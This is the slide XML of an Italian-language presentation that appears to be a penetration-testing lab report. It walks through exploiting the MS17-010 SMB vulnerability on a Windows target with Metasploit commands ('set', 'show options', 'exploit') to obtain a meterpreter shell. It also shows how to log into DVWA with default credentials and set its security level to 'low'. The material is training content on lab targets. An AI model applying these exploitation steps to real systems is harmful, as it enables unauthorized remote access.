              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Con il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> andiamo ad impostare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>l’host remoto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, ovvero il nostro target Windows, poi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>l’host locale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> ovvero la nostra macchina e infine la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>porta locale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1879">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> dove faremo arrivare la connessione della shell. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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167676" y="-3765912"/>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794537" y="5340625"/>
            <a:ext cx="7548481" cy="7001216"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7001216" w="7548481">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7548482" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7548482" y="7001216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="700121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081690"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8" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="295453" y="196351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2705160" y="617220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21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9144000" y="2346738"/>
            <a:ext cx="8820167" cy="7240175"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="7240175" w="8820167">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8820167" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8820167" y="7240174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7240174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="-1909" r="-12184" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 22" id="22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-5400000">
            <a:off x="7519216" y="5187809"/>
            <a:ext cx="1394438" cy="1558032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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5" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="584839" y="3603241"/>
            <a:ext cx="5802843" cy="4022253"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3526"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2518">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Digitando il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2518">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2518">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, vediamo tutti i parametri richiesti per la configurazione dell’exploit e possiamo vedere come i dati inseriti prima siano stati salvati. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3526"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3526"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2518">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Importante notare come la porta remota sia di default la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2518">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2518">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, dove gira il protocollo SMB. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3519849"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3.2 - SFRUTTAMENTO VULN MS17-010</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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970781" y="5472112"/>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61868" y="-185771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081690"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17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="14369931" y="-874857"/>
            <a:ext cx="3597471" cy="3444579"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3444579" w="3597471">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3597472" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3597472" y="3444578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3444578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 18" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="295453" y="196351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3075985" y="5472112"/>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21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="7492438" y="1789895"/>
            <a:ext cx="10474964" cy="4922960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4922960" w="10474964">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10474965" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10474965" y="4922960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4922960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 22" id="22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="464664">
            <a:off x="7452071" y="6983058"/>
            <a:ext cx="2336398" cy="2301352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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5" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="184501" y="3827079"/>
            <a:ext cx="6629668" cy="3574578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3526"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2518">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Vediamo se il nostro exploit riesce nel’intento. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3526"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3526"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2518">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Digitiamo il comando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2518">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2518">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2518">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>e come possiamo vedere, meterpreter viene caricato sulla machina target e così saremo in grado di eseguire dei comandi da remoto sulla macchina target. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="584839"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3.3 - FASE DI TEST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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730615" y="1033801"/>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1275083" y="-1823040"/>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17" id="17"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1759925" y="384054"/>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2 - CONFIGURAZIONE DVWA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 19" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10481525" y="3856147"/>
            <a:ext cx="7531557" cy="5374277"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5374277" w="7531557">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7531557" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7531557" y="5374276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5374276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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2298040" y="5143500"/>
            <a:ext cx="1684710" cy="958179"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="958179" w="1684710">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1684710" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1684710" y="958179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="958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2459060">
            <a:off x="10184390" y="2646933"/>
            <a:ext cx="2181387" cy="1011618"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1011618" w="2181387">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2181387" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2181387" y="1011618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="101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265738" y="1601369"/>
            <a:ext cx="7561949"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Livello difficoltà DVWA</a:t>
            </a:r>
          </a:p>
        </p:txBody>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782093" y="3020085"/>
            <a:ext cx="8913951" cy="5928360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" marL="453392" indent="-226696" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Accedere alla pagina login della DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>:  Apriamo il nostro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e navighiamo alla pagina di login dell'applicazione Damn Vulnerable Web Application (DVWA) all’indirizzo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>http://192.168.13.150/dvwa/login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, con le credenziali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>“admin”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>“password”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="453392" indent="-226696" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Accedere alla sezione di sicurezza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Una volta effettuato l'accesso, cerchiamo e clicchiamo sulla voce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>"DVWA Security"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> nel menu principale dell'applicazione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="453392" indent="-226696" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Impostare il livello di sicurezza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Nella pagina DVWA Security, troveremo un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>menu a tendina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> per selezionare il livello di sicurezza. Selezioniamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>l'opzione "low"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> dal menu a tendina e clicchiamo su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Italics"/>
              </a:rPr>
              <a:t>submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> per confermare.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="453392" indent="-226696" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Verificare la modifica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Se l'operazione è stata eseguita correttamente, vedremo il vostro nome utente e il livello di sicurezza "low" visualizzati in basso a sinistra dello schermo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
            </a:pP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928768" y="4613963"/>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95453" y="196351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5" id="5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8910458" y="-4574822"/>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6" id="6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="-1046562" y="595509"/>
            <a:ext cx="6818253" cy="9448256"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="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8" id="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9" id="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10" id="1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1" id="1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2" id="1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3" id="1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4" id="1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5" id="1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7" id="1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8" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-1097070" y="-1916359"/>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9433659" y="549593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21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11388010" y="6499838"/>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22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="8118271" y="2569721"/>
            <a:ext cx="9387070" cy="1830915"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1830915" w="9387070">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9387070" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9387070" y="1830915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1830915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="7968914" y="6309662"/>
            <a:ext cx="10180179" cy="3721712"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3721712" w="10180179">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10180179" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10180179" y="3721712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3721712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="-372" t="0" r="-2236" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
